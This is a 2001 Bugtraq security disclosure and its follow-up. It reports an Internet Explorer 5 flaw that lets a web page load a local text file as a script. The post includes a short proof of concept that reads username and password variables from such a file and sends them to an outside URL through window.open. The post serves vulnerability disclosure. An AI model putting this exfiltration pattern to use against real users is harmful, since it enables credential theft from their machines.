RE: security bug Internet Explorer 5

[Stefaan Deman <Stefaan.Deman () compex be>]

I noticed that my previous mail was strangly reformatted. I guess Outlook
tried to outsmart me again.

The script tag should be 
<script src="file:///C:/WINNT/test.txt"></script>

-----Original Message-----
From: Stefaan Deman [mailto:Stefaan.Deman () compex be]
Sent: Wednesday, June 06, 2001 10:27 AM
To: 'bugtraq () securityfocus com'
Subject: security bug Internet Explorer 5


There is a security bug in the Internet Explorer 5 (I haven't tested it on
other browsers).
It is possible to read some textfiles (others than cookies) from the
client's hard disk.
If there is for example in the directory 'C:\WINNT' a textfile 'test.txt'
with content:
 
us="stefaan"
passwd="mypasswd"
 

then it is possible to read this file in an HTML page with the tag:
 
<script src="  <file:///C:/WINNT/test.txt>
file:///C:/WINNT/test.txt"></script>
 
The HTML page will consider the file as a script and us and passwd will be
considered as variables 
in the previous example.
 
It is then possible to use this information or send this (possible critical)
information back to the
webserver with for example
 
<script>
 //alert(passwd)
 window.open("  <http://myurl/myasppage.asp?us>
http://myurl/myasppage.asp?us="; + escape(us) + ";passwd=" +  escape(passwd),
"blabla")
</script>
 

This is a security bug, it should be impossible to read any file on the
client's file system.
Of course the file should have a correct JavaScript or VBscript syntax and
the filename should be known.
However, it is easy to image how this security hole can be misused.

This bug isn't as severe as the one posted by Guninski (
<http://www.guninski.com/scractx.html>
http://www.guninski.com/scractx.html). 
The difference between this bug and the one of Guninski is that this
security hole doesn't make use of
Active X components.
 
Stefaan Deman